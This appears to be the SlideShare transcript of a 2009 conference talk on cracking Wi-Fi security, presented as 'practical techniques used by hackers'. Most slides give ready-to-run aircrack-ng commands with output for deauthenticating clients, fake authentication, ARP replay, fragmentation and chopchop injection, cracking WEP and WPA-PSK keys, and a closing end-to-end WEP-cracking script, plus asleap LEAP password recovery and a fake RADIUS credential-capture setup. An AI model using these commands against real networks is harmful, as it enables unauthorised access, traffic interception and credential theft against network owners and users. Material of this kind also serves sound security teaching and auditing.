Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

  • 3,796 views
Uploaded on

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation …

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

#barcampkl 2009

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • lol u guys if there's any question just email me at the email inside the slide
    Are you sure you want to
    Your message goes here
No Downloads

Views

Total Views
3,796
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
118
Comments
1
Likes
2

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Special thanks to: Milw0rm | str0ke paperwork released on 24/2/2009 AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
  • 2. Contents Introduction  Conclusion steps for cracking WEP  Security of Wireless network  Owned the WPA-PSK / WPA2-PSK Key  Breaking the Simple Defenses  Exploiting Enterprise Wireless Connection (WPA-  Mac Filtering  TLS/TTLS/PEAP) Discover Hidden SSID  Exploiting CISCO LEAP  Sniffing Information on the Air  Get closer with cracking tool Refrences & Greetz to   Aircrack-ng suite  About Me / Questions  Decrypt packet with airdecap-ng  Decloak packet with airdecloak-ng  Owned the WEP Key with Simple Technique (No  Injection) Capturing method  Cracking method  Owned the WEP Key with Advanced Technique  (With Inject Method) Monitor Mode  Fake Authentication  ARP Replay Attack  Fragmentation Attack  Korek ChopChop Attack  Packetforge  ARP Request Replay with Interactive Attack  Cracking WEP key 
  • 3. Introduction This presentation will introduce to you guys  the practical techniques used by hackers to break the wireless security. You really need to have some basic  knowledge of wireless operation to understand.
  • 4. Security of Wireless Network WPA- WEP WPA2-PSK PSK WPA2-802.11x WPA-802.11x
  • 5. Breaking the Simple Defenses Bypass MAC Filtering ? Hacker Wait wait.. Lemme check with my system first Wow! You’re LEGIT! You shall pass no0b
  • 6. Breaking the Simple Defenses Bypass MAC Filtering Hacker no0b
  • 7. Breaking the Simple Defenses Discover Hidden SSID Hacker Ayam Goreng (Hidden SSID)
  • 8. Breaking the Simple Defenses Discover Hidden SSID - SSID broadcasting can be disabled in beacon frames ONLY - All other management frames (probe/responses, Hacker association and reassociations frames) contains the SSID or the network. So… what can I do is….. - Forge DISASSOCIATE frames, to a station seaming to come from the ACCESS POINT, so the station tries to reassociate (and send the SSID) - Reboot a client, so it reassociate when it initialize (if you have physical access to equipments) - RF jam (interferences) a client so it tries to reassociate (and expose SSID) - Install a fake Access Point near a client with weak signal so it tries to roam (probe requests will be sent).
  • 9. Breaking the Simple Defenses Discover Hidden SSID #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] #airodump-ng wlan0 Hacker Ayam Goreng (Hidden SSID) OSHII--
  • 10. Breaking the Simple Defenses Sniffing Information on the Air
  • 11. Get Closer with the Cracking Tool Aircrack-ng suite Aircrack-ng suite is a set of tools for auditing wireless  networks. 4 main tools for today:  Airodump-ng – Used for capturing packets  Aireplay-ng – Used for injection  De-authentication  Fake authentication  Interactive packet replay  ARP replay  KoreK Chopchop  Fragment  Packetforge-ng – Used for creating packets  Aircrack-ng – Used for recovering keys 
  • 12. Get Closer with the Cracking Tool Decrypt packets with airdecap-ng For WPA, airdecap-ng will return successful result  for only file which contains four ways handshake.
  • 13. Get Closer with the Cracking Tool Decloak packet with airdecloak-ng Cloaking is a technique to disturb cracking WEP key process.  This technique is done by injecting packets which are encrypted  with random WEP key to the network, these packets are called quot;chaffquot;. If the attacker capture these packet and do the cracking, The result will be wrong or there is no result returned. However, the aircrack team have developed the tool to deal with  this technique, it is called quot;airdecloak-ngquot;. #airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap This command return two files:  - workshop-01-filtered.cap: contain the filtered packets from specific  bssid - workshop-01-cloaked.cap: contain the cloaked packets from specific  bssid
  • 14. Get Closer with the Cracking Tool Aircracking 101 PTW Attack  (-z) (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits,  Require ARP request/replay packet that you must dump all packet from airodump-ng Dictionary Attack  (WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)  Fudge Attack  (-f) Once hit 2 millions IVs, Try fudge factor to quot;-f 4quot;. Retry,  increasing the fudge factor by adding 4 to it each time. All the while, keep collecting data. Remember the golden  rule, quot;The More IVs the Betterquot;
  • 15. Pwning the WEP key WEP FFFFFFFFFUUUUUUUUUUUUU-- Hacker
  • 16. Owned the WEP Key with Simple Technique (No Injection) Lets assume that the network has a high-traffic so  we don’t need to do all those injection stuffs and so on. Preparation :  A device which supports monitor mode and can inject  packets to the network. MY Preparation:  5 years old laptop – AMD Turion64 1.6GHz 256MB  DDR (still working harmoniously despite…)  Ubuntu Intrepid Ibex 8.10  Broadcomm chipset running legacy b43 driver.
  • 17. Owned the WEP Key with Simple Technique (No Injection) Capturing Method 64-bits key – 50,000 IV packets  128-bits key – 150,000 IV packets  #airodump-ng –w workshop rausb0 ------------------------------------------------------------------------------------------ [ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop BSSID STATION PWR Rate Lost Packets Probes xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747 ------------------------------------------------------------------------------------------
  • 18. Owned the WEP Key with Simple Technique (No Injection) Cracking Method #aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap -b xx:xx:xx:xx:xx:xx is the MAC address of target access point The successful cracking result is following: --------------------------------------------------------------- Opening workshop-01.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
  • 19. Owned the WEP Key with Advanced Technique (With Inject Method) Lets assume that the network has no traffic at all.  We can conclude about the requirements of chosen  packet for injection as following. The MAC address is associated to access point. (we can  do this by fake authentication) Send from client to access point. (the “To DS” flag is set to  1) The destination MAC address is broadcasted.  (FF:FF:FF:FF:FF:FF) The well-known packet which covers all requirements  is ARP request broadcast. We can divide the situation for injection technique into  2 scenarios. The network has ARP request.  The network has no ARP request. 
  • 20. Owned the WEP Key with Advanced Technique (With Inject Method) Monitor mode Using airmon-ng to set your wifi card to Monitor Mode  and prepare for packet injection. #airmon-ng start wlan0 11 Setting wlan0 to Monitor mode on channel 11, We must  specify the same channel as the target AP channel. Troops. Prepare for assault! Hacker Affirmative I Choose YOU!
  • 21. Owned the WEP Key with Advanced Technique (With Inject Method) Fake Authentication We can do fake authentication by the following command:  #aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –a xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card If we get successful result, our MAC address will associate  with particular access point. ------------------------------------------ 00:00:00 Sending Authentication Request 00:00:00 Authentication successful 00:00:00 Sending Association Request 00:00:00 Association successful :-) ------------------------------------------ After succeeding in fake authentication, we have to determine  what type of network we are faced with and pick the appropriate steps to deal with it.
  • 22. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Replay Attack We can use ARP replay attack by following  command: #aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 –b xx:xx:xx:xx:xx:xx is MAC address of access point –h yy:yy:yy:yy:yy:yy is MAC address of our wireless card Aireplay-ng will detect ARP request and use it  to perform replay attack automatically. ------------------------------------------------------------------------------------ 21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 Saving ARP requests in replay_arp-0223-210620.cap You should also start airodump-ng to capture replies. Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps) ------------------------------------------------------------------------------------
  • 23. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack Fragment attack is used to generate key  stream in a size of 1500 bytes. So, we can use this key stream to create a packet which has size up to 1500 bytes. The command for fragment attack is: #aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
  • 24. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack The system responds with this:  ------------------------------------------------------------------------------- 21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 21:21:07 Waiting for a data packet... Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r 0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8* 0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c 0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z 0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z. Use this packet ? -------------------------------------------------------------------------------
  • 25. Owned the WEP Key with Advanced Technique (With Inject Method) Fragmentation Attack We just have to answer yes  ----------------------- Use this packet ? y ----------------------- And the successful process looks like this:  ---------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-212107.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0223-212107.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream ----------------------------------------------------------------------------------
  • 26. Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack We are able to use chopchop attack with this command:  #aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng will pick a packet for decrypting. we can should any  packet which has BSSID like our target. -------------------------------------------------------------------------------------- 21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 Size: 90, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = 00:1A:73:37:E2:A3 Source MAC = 00:1B:2F:3D:CB:D6 0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. 0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N 0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. 0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K.... 0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. 0x0050: b09b f0f1 8b04 fc1c 0b72 .........r Use this packet ? ----------------------------------------------------------------------------------------
  • 27. Owned the WEP Key with Advanced Technique (With Inject Method) Korek ChopChop Attack Just answer yes  ----------------------- Use this packet ? y ----------------------- And then the system will do the decrypting  --------------------------------------------------------------------------------------- Saving chosen packet in replay_src-0223-211242.cap Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms And so on ... The AP appears to drop packets shorter than 40 bytes. Enabling standard workaround: IP header re-creation. Saving plaintext in replay_dec-0223-211410.cap Saving keystream in replay_dec-0223-211410.xor Completed in 21s (2.48 bytes/s) ---------------------------------------------------------------------------------------
  • 28. Owned the WEP Key with Advanced Technique (With Inject Method) Packetforge To create encrypted packet form PRGA (XOR)  that obtained from the chopchop or fragment attack. #Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l 255.255.255.255 –y replay_dec-0223-211410.xor –w arp The result is:  ---------------------- Wrote packet to: arp ---------------------- From this command, we get ARP request packet  in file named “arp”.
  • 29. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack We use aireplay to inject arp request packet to access  point by following command: #aireplay-ng -2 –r arp rausb0 And…  ----------------------------------------------------------------------------------- Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:1B:2F:3D:CB:D6 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:21:27:C0:07:71 0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q 0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4 0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; 0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ 0x0040: 66bf 700e f.p. Use this packet ? -----------------------------------------------------------------------------------
  • 30. Owned the WEP Key with Advanced Technique (With Inject Method) ARP Request Replay with Interactive Attack Yes is the only option available  ----------------------- Use this packet ? y ----------------------- Now aireplay-ng starts injecting the packets  ------------------------------------------------------- Saving chosen packet in replay_src-0223-211755.cap You should also start airodump-ng to capture replies. Sent 1200 packets...(499 pps) ------------------------------------------------------- And don’t forget to start airodump-ng 
  • 31. Owned the WEP Key with Advanced Technique (With Inject Method) Cracking WEP Key #aircrack-ng –z capture1.cap (PTW Attack) The successful cracking result is following: --------------------------------------------------------------- Opening capture1.cap Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. KEY FOUND! [ 00:11:22:33:44 ] Decrypted correctly: 100% ---------------------------------------------------------------
  • 32. Conclusion Scripts for Cracking WEP $AP is Access Point MAC Address  $WIFI is WIFI Card MAC Address  airmon-ng start wlan0 11 (Must specific channel of Monitor Mode) airodump-ng -c 11 -w capture1.cap wlan0 aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 aireplay-ng -4 -b $AP -h $WIFI wlan0 If Its Not Working!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp aireplay-ng -2 -r arp wlan0 aircrack-ng -z capture1.cap
  • 33. Owned the WPA-PSK/WPA2-PSK Key The idea for cracking Pre-shared key is to  gather four ways handshake packets.
  • 34. Owned the WPA-PSK/WPA2-PSK Key We are able to do this by de-authenticate  associated client. This way will force the client to perform re-  authentication and we can get four ways handshake from this process. The command for de-authentication is:  #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
  • 35. Owned the WPA-PSK/WPA2-PSK Key #aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap Opening test-02.cap Read 252 packets. # BSSID ESSID Encryption 1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) Choosing first network as target. Opening workshop-02.cap Reading packets, please wait... Aircrack-ng 1.0 rc1 r1085 [00:00:00] 0 keys tested (0.00 k/s) KEY FOUND! [ TheFuckinWPAKey ] Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
  • 36. Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP) Most companies turned to use public key encryption with  wireless network and they think that it is perfectly safe. But the tricky hacker still attacks this system by spoofing  certificate. This attacking method takes an advantage of client incaution.  Many clients accept certification without considering whether it is genuine certificate or not. This make attacker impersonate himself to be radius server  and login credential information from victims. We can use freeradius as fake radius server combining with  WPE patch to enable login credential information on freeradius server additional information:  http://www.willhackforsushi.com/FreeRADIUS_WPE.html
  • 37. Exploiting CISCO LEAP Cisco proprietary Lightweight Extensible  Authentication Protocol (LEAP) wireless authentication process helps eliminate security vulnerabilities by supporting centralized, user- based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extensible  authentication protocol (EAP) types specified by 802.1X. We found that the usernames that are sent to  Radius are plaintexts, that captured from Wireshark but the password was encrypted. So It's also vulnerable to exploit… (insert evil 
  • 38. Exploiting CISCO LEAP asleap is a tool designed to recover weak  LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords. asleap can perform:   Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture  Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED Download Here: http://asleap.sourceforge.net/ 
  • 39. Exploiting CISCO LEAP First step, Use asleap to produce the  necessary database (.dat) and index files (.idx) #./genkeys -r dictionary -f dict.dat -n dict.idx dict = Our wordlist/dictionary file, with one word per line dict.dat = Our new output pass+hash file (generated as a result of running this command) dict.idx = Our new output index filename (generated as a result of running this command) ----------------------------------------------------------------------- genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com> Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second Starting sort (be patient) ...Done. Completed sort in 0 compares. Creating index file (almost finished) ...Done. –----------------------------------------------------------------------
  • 40. Exploiting CISCO LEAP The final step in recovering our weak LEAP password is  to run the asleap command with our newly created .dat and .idx files: #./asleap -r data/leap.dump -f dict.dat -n dict.idx leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used) dict.dat = Our output pass+hash file (generated with genkeys, see above) dict.idx = Our new output index filename (generated with genkeys, see above)
  • 41. Exploiting CISCO LEAP So… what are we waiting for?  #./asleap -r data/leap.dump -f dict.dat -n dict.idx ----------------------------------------------------------------------- asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> Using the passive attack method. Captured LEAP exchange information: username: qa_leap challenge: 0786aea0215bc30a response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 hash bytes: 4a39 NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 password: qaleap Closing pcap ... ----------------------------------------------------------------------- Now ASLEAP 2.2, which includes the “-C” and “-R” options to specify the  hex-delimited bytes for the challenge and the response (respectively). Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have a MS-CHAPv2 packet capture available.
  • 42. References & Greetz to PaulDotCom Forum  http://www.darkoperator.com/scripts  http://trac.metasploit.com/wiki/Karmetasploit  http://aircrack-ng.org/doku.php  http://www.citec.us  http://www.milw0rm.com  Greetz to the CWH Underground team:  Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter,  Conan, Win7dos, Gdiupo, GnuKDE, JK Special Thx : asylu3, str0ke, citec.us, milw0rm.com 
  • 43. About Me / Questions I’m Siddiq, 19.   Currently pursuing Degree in Biochemistry at Technology Park Malaysia College.  A retarded lazy part-time web programmer @ I- don’t-know-anything-about-IT  Currently looking for a real part-time job.  mysiddiq@gmail.com Thanks for attending.  Questions? 